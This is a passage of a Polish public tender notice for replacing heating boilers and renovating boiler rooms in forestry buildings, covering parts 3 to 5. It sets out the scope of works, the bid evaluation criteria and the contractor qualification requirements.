class="normal">45232460-4 - Roboty sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">44621220-7 - Kotły grzewcze centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru oferty najkorzystniejszej Zamawiający będzie kierował się następującymi<br/>kryteriami:<br/>Najniższa Cena (C) – 60%<br/>Wydłużenie okresu gwarancji (G) – 40 pkt<br/>21.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium ,,Cena” ocena złożonych ofert zostanie dokonana wg następującego<br/>wzoru:<br/>najniższa oferowana cena<br/>--------------------------------------- x 100x 60% = liczba pkt przyznanych<br/>cena oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie całego zamówienia podana w formularzu ofertowym<br/>sporządzonym wg załącznika nr 1 do SWZ.<br/>2) W ramach kryterium „Wydłużenie okresu gwarancji”, za które można uzyskać 40 pkt zostanie wyliczone w następujący sposób:<br/>Okres gwarancji wynosi 36 miesięcy. Jeżeli Wykonawca zaoferuje:<br/>a) 36 miesięcy gwarancji otrzyma 0 pkt,<br/>b) 48 miesięcy gwarancji otrzyma 20 pkt,<br/>c) 60 miesięcy gwarancji otrzyma 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do przedłużenia okresu gwarancji poprzez<br/>zakreślenie przez Wykonawcę odpowiedniej treści w formularzu oferty.<br/>3) Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg. poniższego wzoru:<br/>S = C + G<br/>gdzie:<br/>S – całkowita liczba punktów;<br/>C - liczba punktów w ramach kryterium „Najniższa cena”;<br/>G - liczba punktów w ramach kryterium „Wydłużenie okresu gwarancji”<br/>21.3. Oceną końcową będzie suma punktów otrzymanych w poszczególnych kryteriach, o których mowa w pkt 2.<br/>Szczegółowe informacje o sposobie oceny ofert zawiera rozdział 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 3. WYMIANA ŹRÓDŁA CIEPŁA WRAZ Z REMONTEM POMIESZCZENIA KOTŁOWNI W BUDYNKU DAWNEJ<br/>PODLEŚNICZÓWKI TORFY (NR INW.:110-00237)<br/>Lokalizacja: ul. Torfy 3, 05-480 Karczew (dz. ew. 28/4, obr. 46, gmina Karczew)<br/>Budynek mieszkalny w 100% powierzchni użytkowej.<br/>Zakres prac sanitarnych:<br/>1) Wymiana kotła stałopalnego na nowy kocioł zgazowujący drewno 5 klasy;<br/>2) Wymianę urządzeń orurowania i armatury w kotłowni;<br/>3) Dostosowanie pomieszczenia kotłowni do obowiązujących wymagań w zakresie instalacyjnym.<br/>Zakres towarzyszących robót budowlanych:<br/>1) Demontaż istniejącej stolarki drzwiowej;<br/>2) Oczyszczenie istniejącej studzienki schładzającej;<br/>3) Wykonanie kanałów wentylacji grawitacyjnej nawiewnych i wywiewnych;<br/>4) Montaż stolarki drzwiowej;<br/>5) Malowanie posadzki betonowej;<br/>6) Naprawa tynków wewnętrznych;<br/>7) Roboty malarskie.<br/>Zakres robót w każdej z 5 części uwzględnia również:<br/>1) dostosowanie połączeń do istniejących w kotłowni instalacji w celu zapewnienia prawidłowego działania urządzenia oraz<br/>wymianę elementów instalacji (m.in. elektrycznej, hydraulicznej, sanitarnej, wentylacyjnej lub kominowej),<br/>2) wykonanie niezbędnych robót budowlanych w celu dostosowania parametrów pomieszczenia kotłowni do obowiązujących<br/>wymagań w zakresie instalacyjnym,<br/>3) prace remontowo-naprawcze w kotłowni oraz odtworzenie do stanu pierwotnego wszelkich naruszonych powierzchni,<br/>elementów konstrukcyjnych oraz innych elementów uszkodzonych, bądź naruszonych podczas prac montażowych lub<br/>modernizacyjnych,<br/>4) wykonanie wymaganych kontroli, sprawdzeń oraz odbiorów przez uprawnione osoby (m.in. kominiarza), prób i sprawdzeń<br/>z dokonaniem regulacji instalacji c.o. oraz przeszkolenia osób obsługujących kocioł (potwierdzone protokołem ze szkolenia),<br/>5) utylizację powstałych odpadów budowlanych w tym starego kotła wraz ze zbędnym wyposażeniem i elementami instalacji.<br/>Wykonawca zobowiązany będzie przy odbiorze końcowym dostarczyć Zamawiającemu kartę przekazania odpadu BDO.<br/>6) jeżeli zajdzie taka potrzeba, Zamawiający może żądać od Wykonawcy drugiego uruchomienia (ustawienia parametrów<br/>pieca) przez serwis fabryczny w trakcie trwania sezonu grzewczego.<br/>3.3. Przewidywany do wykonania zakres robót przedstawia szczegółowy opis przedmiotu zamówienia (załącznik nr 9)<br/>zawierający:<br/>a) projekt techniczny instalacji sanitarnej;<br/>b) projekt robót budowlanych (brak tego dokumentu dla cz. 5 zamówienia);<br/>c) specyfikacja technicznego wykonania i odbioru robót;<br/>d) przedmiary robót.<br/>Uwaga! Załączone do dokumentacji przedmiary robót, z racji ryczałtowego rozliczenia prac, są tylko dokumentem<br/>pomocniczym. Wykonawca musi samodzielnie określić całokształt prac do wykonania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232460-4 - Roboty sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru oferty najkorzystniejszej Zamawiający będzie kierował się następującymi<br/>kryteriami:<br/>Najniższa Cena (C) – 60%<br/>Wydłużenie okresu gwarancji (G) – 40 pkt<br/>21.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium ,,Cena” ocena złożonych ofert zostanie dokonana wg następującego<br/>wzoru:<br/>najniższa oferowana cena<br/>--------------------------------------- x 100x 60% = liczba pkt przyznanych<br/>cena oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie całego zamówienia podana w formularzu ofertowym<br/>sporządzonym wg załącznika nr 1 do SWZ.<br/>2) W ramach kryterium „Wydłużenie okresu gwarancji”, za które można uzyskać 40 pkt zostanie wyliczone w następujący sposób:<br/>Okres gwarancji wynosi 36 miesięcy. Jeżeli Wykonawca zaoferuje:<br/>a) 36 miesięcy gwarancji otrzyma 0 pkt,<br/>b) 48 miesięcy gwarancji otrzyma 20 pkt,<br/>c) 60 miesięcy gwarancji otrzyma 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do przedłużenia okresu gwarancji poprzez<br/>zakreślenie przez Wykonawcę odpowiedniej treści w formularzu oferty.<br/>3) Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg. poniższego wzoru:<br/>S = C + G<br/>gdzie:<br/>S – całkowita liczba punktów;<br/>C - liczba punktów w ramach kryterium „Najniższa cena”;<br/>G - liczba punktów w ramach kryterium „Wydłużenie okresu gwarancji”<br/>21.3. Oceną końcową będzie suma punktów otrzymanych w poszczególnych kryteriach, o których mowa w pkt 2.<br/>Szczegółowe informacje o sposobie oceny ofert zawiera rozdział 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 4. WYMIANA ŹRÓDŁA CIEPŁA WRAZ Z REMONTEM POMIESZCZENIA KOTŁOWNI W BUDYNKU<br/>PODLEŚNICZÓWKI ZBÓJNA GÓRA (NR INW.: 110-00098)<br/>Lokalizacja: ul. Trakt Napoleoński 62, 04-724 Warszawa (dz. ew. 69, obr. 3-11-65, gmina Dzielnica Wawer)<br/>Budynek mieszkalny w 100% powierzchni użytkowej.<br/>Zakres prac sanitarnych:<br/>1) Wymiana kotła stałopalnego na nowy kocioł zgazowujący drewno 5 klasy;<br/>2) Wymianę urządzeń orurowania i armatury w kotłowni;<br/>3) Dostosowanie pomieszczenia kotłowni do obowiązujących wymagań w zakresie instalacyjnym.<br/>Zakres towarzyszących robót budowlanych:<br/>1) Demontaż istniejącej stolarki drzwiowej;<br/>2) Rozebranie istniejących schodów zewnętrznych;<br/>3) Montaż belek nadprożowych w miejscu poszerzenia otworu;<br/>4) Poszerzenie otworu drzwiowego;<br/>5) Wykonanie podbicia istniejących fundamentów w części wskazanej w dokumentacji projektowej w celu zwiększenia<br/>wysokości pomieszczenia;<br/>6) Wykonanie nowej posadzki betonowej;<br/>7) Ułożenie gresu technicznego na nowej posadzce;<br/>8) Wykonanie nowych schodów betonowych zewnętrznych;<br/>9) Wykonanie studzienki schładzającej wraz z montażem pompy do przepompowywania wody;<br/>10) Wykonanie nowego kanału spalinowego izolowanego;<br/>11) Wykonanie kanałów wentylacji grawitacyjnej nawiewnych i wywiewnych;<br/>12) Naprawa tynków wewnętrznych;<br/>13) Roboty malarskie.<br/>Zakres robót w każdej z 5 części uwzględnia również:<br/>1) dostosowanie połączeń do istniejących w kotłowni instalacji w celu zapewnienia prawidłowego działania urządzenia oraz<br/>wymianę elementów instalacji (m.in. elektrycznej, hydraulicznej, sanitarnej, wentylacyjnej lub kominowej),<br/>2) wykonanie niezbędnych robót budowlanych w celu dostosowania parametrów pomieszczenia kotłowni do obowiązujących<br/>wymagań w zakresie instalacyjnym,<br/>3) prace remontowo-naprawcze w kotłowni oraz odtworzenie do stanu pierwotnego wszelkich naruszonych powierzchni,<br/>elementów konstrukcyjnych oraz innych elementów uszkodzonych, bądź naruszonych podczas prac montażowych lub<br/>modernizacyjnych,<br/>4) wykonanie wymaganych kontroli, sprawdzeń oraz odbiorów przez uprawnione osoby (m.in. kominiarza), prób i sprawdzeń<br/>z dokonaniem regulacji instalacji c.o. oraz przeszkolenia osób obsługujących kocioł (potwierdzone protokołem ze szkolenia),<br/>5) utylizację powstałych odpadów budowlanych w tym starego kotła wraz ze zbędnym wyposażeniem i elementami instalacji.<br/>Wykonawca zobowiązany będzie przy odbiorze końcowym dostarczyć Zamawiającemu kartę przekazania odpadu BDO.<br/>6) jeżeli zajdzie taka potrzeba, Zamawiający może żądać od Wykonawcy drugiego uruchomienia (ustawienia parametrów<br/>pieca) przez serwis fabryczny w trakcie trwania sezonu grzewczego.<br/>3.3. Przewidywany do wykonania zakres robót przedstawia szczegółowy opis przedmiotu zamówienia (załącznik nr 9)<br/>zawierający:<br/>a) projekt techniczny instalacji sanitarnej;<br/>b) projekt robót budowlanych (brak tego dokumentu dla cz. 5 zamówienia);<br/>c) specyfikacja technicznego wykonania i odbioru robót;<br/>d) przedmiary robót.<br/>Uwaga! Załączone do dokumentacji przedmiary robót, z racji ryczałtowego rozliczenia prac, są tylko dokumentem pomocniczym. Wykonawca musi samodzielnie określić całokształt prac do wykonania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232460-4 - Roboty sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">44621220-7 - Kotły grzewcze centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru oferty najkorzystniejszej Zamawiający będzie kierował się następującymi<br/>kryteriami:<br/>Najniższa Cena (C) – 60%<br/>Wydłużenie okresu gwarancji (G) – 40 pkt<br/>21.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium ,,Cena” ocena złożonych ofert zostanie dokonana wg następującego<br/>wzoru:<br/>najniższa oferowana cena<br/>--------------------------------------- x 100x 60% = liczba pkt przyznanych<br/>cena oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie całego zamówienia podana w formularzu ofertowym<br/>sporządzonym wg załącznika nr 1 do SWZ.<br/>2) W ramach kryterium „Wydłużenie okresu gwarancji”, za które można uzyskać 40 pkt zostanie wyliczone w następujący sposób:<br/>Okres gwarancji wynosi 36 miesięcy. Jeżeli Wykonawca zaoferuje:<br/>a) 36 miesięcy gwarancji otrzyma 0 pkt,<br/>b) 48 miesięcy gwarancji otrzyma 20 pkt,<br/>c) 60 miesięcy gwarancji otrzyma 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do przedłużenia okresu gwarancji poprzez<br/>zakreślenie przez Wykonawcę odpowiedniej treści w formularzu oferty.<br/>3) Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg. poniższego wzoru:<br/>S = C + G<br/>gdzie:<br/>S – całkowita liczba punktów;<br/>C - liczba punktów w ramach kryterium „Najniższa cena”;<br/>G - liczba punktów w ramach kryterium „Wydłużenie okresu gwarancji”<br/>21.3. Oceną końcową będzie suma punktów otrzymanych w poszczególnych kryteriach, o których mowa w pkt 2.<br/>Szczegółowe informacje o sposobie oceny ofert zawiera rozdział 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 5. WYMIANA ŹRÓDŁA CIEPŁA W BUDYNKU MIESZKALNYM OSADA OTWOCK (NR INW.: 110-11341)<br/>Lokalizacja: ul. Poniatowskiego 34a, 05-400 Otwock (dz. ew. 34, obr. 148, gmina Otwock)<br/>Budynek mieszkalny w 100% powierzchni użytkowej.<br/>Zakres prac sanitarnych:<br/>1) Wymiana kotła stałopalnego na gazowy kondensacyjny;<br/>2) Wymianę urządzeń orurowania i armatury w kotłowni;<br/>3) Dostosowanie pomieszczenia kotłowni do obowiązujących wymagań w zakresie instalacyjnym<br/>Zakres robót w każdej z 5 części uwzględnia również:<br/>1) dostosowanie połączeń do istniejących w kotłowni instalacji w celu zapewnienia prawidłowego działania urządzenia oraz<br/>wymianę elementów instalacji (m.in. elektrycznej, hydraulicznej, sanitarnej, wentylacyjnej lub kominowej),<br/>2) wykonanie niezbędnych robót budowlanych w celu dostosowania parametrów pomieszczenia kotłowni do obowiązujących<br/>wymagań w zakresie instalacyjnym,<br/>3) prace remontowo-naprawcze w kotłowni oraz odtworzenie do stanu pierwotnego wszelkich naruszonych powierzchni,<br/>elementów konstrukcyjnych oraz innych elementów uszkodzonych, bądź naruszonych podczas prac montażowych lub<br/>modernizacyjnych,<br/>4) wykonanie wymaganych kontroli, sprawdzeń oraz odbiorów przez uprawnione osoby (m.in. kominiarza), prób i sprawdzeń<br/>z dokonaniem regulacji instalacji c.o. oraz przeszkolenia osób obsługujących kocioł (potwierdzone protokołem ze szkolenia),<br/>5) utylizację powstałych odpadów budowlanych w tym starego kotła wraz ze zbędnym wyposażeniem i elementami instalacji.<br/>Wykonawca zobowiązany będzie przy odbiorze końcowym dostarczyć Zamawiającemu kartę przekazania odpadu BDO.<br/>6) jeżeli zajdzie taka potrzeba, Zamawiający może żądać od Wykonawcy drugiego uruchomienia (ustawienia parametrów<br/>pieca) przez serwis fabryczny w trakcie trwania sezonu grzewczego.<br/>3.3. Przewidywany do wykonania zakres robót przedstawia szczegółowy opis przedmiotu zamówienia (załącznik nr 9)<br/>zawierający:<br/>a) projekt techniczny instalacji sanitarnej;<br/>b) projekt robót budowlanych (brak tego dokumentu dla cz. 5 zamówienia);<br/>c) specyfikacja technicznego wykonania i odbioru robót;<br/>d) przedmiary robót.<br/>Uwaga! Załączone do dokumentacji przedmiary robót, z racji ryczałtowego rozliczenia prac, są tylko dokumentem pomocniczym. Wykonawca musi samodzielnie określić całokształt prac do wykonania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232460-4 - Roboty sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">44621220-7 - Kotły grzewcze centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru oferty najkorzystniejszej Zamawiający będzie kierował się następującymi<br/>kryteriami:<br/>Najniższa Cena (C) – 60%<br/>Wydłużenie okresu gwarancji (G) – 40 pkt<br/>21.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium ,,Cena” ocena złożonych ofert zostanie dokonana wg następującego<br/>wzoru:<br/>najniższa oferowana cena<br/>--------------------------------------- x 100x 60% = liczba pkt przyznanych<br/>cena oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie całego zamówienia podana w formularzu ofertowym<br/>sporządzonym wg załącznika nr 1 do SWZ.<br/>2) W ramach kryterium „Wydłużenie okresu gwarancji”, za które można uzyskać 40 pkt zostanie wyliczone w następujący sposób:<br/>Okres gwarancji wynosi 36 miesięcy. Jeżeli Wykonawca zaoferuje:<br/>a) 36 miesięcy gwarancji otrzyma 0 pkt,<br/>b) 48 miesięcy gwarancji otrzyma 20 pkt,<br/>c) 60 miesięcy gwarancji otrzyma 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do przedłużenia okresu gwarancji poprzez<br/>zakreślenie przez Wykonawcę odpowiedniej treści w formularzu oferty.<br/>3) Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg. poniższego wzoru:<br/>S = C + G<br/>gdzie:<br/>S – całkowita liczba punktów;<br/>C - liczba punktów w ramach kryterium „Najniższa cena”;<br/>G - liczba punktów w ramach kryterium „Wydłużenie okresu gwarancji”<br/>21.3. Oceną końcową będzie suma punktów otrzymanych w poszczególnych kryteriach, o których mowa w pkt 2.<br/>Szczegółowe informacje o sposobie oceny ofert zawiera rozdział 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeżeli Wykonawca wykaże, że posiada środki finansowe<br/>lub zdolność kredytową nie mniejszą niż:<br/>dla część 1: 100 000,00 zł<br/>dla części 2: 70 000,00 zł<br/>dla części 3: 70 000,00 zł<br/>dla części 4: 100 000,00 zł<br/>dla części 5: 50 000,00 zł<br/>Jeżeli Wykonawca ubiega się o udzielenie zamówienia na kilka części, warunek w zakresie udziału w postępowaniu sumuje<br/>się.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek w zakresie doświadczenia jeżeli wykaże wykonanie z należytą starannością w okresie<br/>ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie:<br/>W przypadku składania oferty na jedną część zamówienia: minimum jedną robotę budowlaną polegającą m.in. montażu lub<br/>wymianie kotła c.o. wraz z wykonaniem towarzyszących prac instalacyjnych o wartości co najmniej: 30 000,00 zł brutto.<br/>W przypadku składania oferty na dwie lub więcej części zamówienia: minimum dwie roboty budowlane polegające m.in. na montażu lub wymianie kotła c.o. wraz z wykonaniem towarzyszących prac instalacyjnych o wartości co najmniej: 30 000,00<br/>zł brutto każda.<br/>Przy czym przez robotę budowlaną rozumie się wykonanie robót budowlanych na podstawie jednej umowy.<br/>b) Wykonawca spełni warunek w zakresie potencjału osobowego jeżeli wykaże że dysponuje lub będzie dysponować:<br/>1) Składając ofertę na część 1 – 5 zamówienia:<br/>jedną osobą, której powierzona zostanie funkcja kierownika robót: posiadającą uprawnienia budowlane bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych, które uprawniają do kierowania robotami budowlanymi zgodnie z przepisami ustawy z dni 7 lipca 1994 r.<br/>Prawo budowlane (Dz. U. 2021 poz. 2351) oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z 29 kwietnia<br/>2019 r. (Dz. U. 2019 r. poz. 831) lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów prawa albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w<br/>państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2021 poz. 2351.) oraz<br/>ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz.U. z 2023 r. poz. 334).<br/>Wykonawca w przypadku składania ofert na więcej niż jedną część zamówienia, może posługiwać się tym samym<br/>potencjałem osobowym.<br/>2) Składając ofertę na część 1 lub 4 zamówienia:<br/>jedną osobą w charakterze kierownika budowy posiadającą uprawnienia budowlane, do kierowania robotami budowlanymi,<br/>w specjalności konstrukcyjno -budowlanej, bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994r. – Prawo<br/>budowlane oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z 29 kwietnia 2019 r. (Dz. U. 2019 r. poz. 831)<br/>lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa albo<br/>odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego<br/>Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2021 poz. 2351.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2023 r. poz. 334).<br/>Wykonawca w przypadku składania ofert na obie części zamówienia, może posługiwać się tym samym potencjałem osobowym.<br/>Zgodnie z rozdziałem 7 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia, o których mowa w pkt. 6.1 SWZ Zamawiający, działając na podstawie art. 274 ust. 1 PZP wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1. oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, 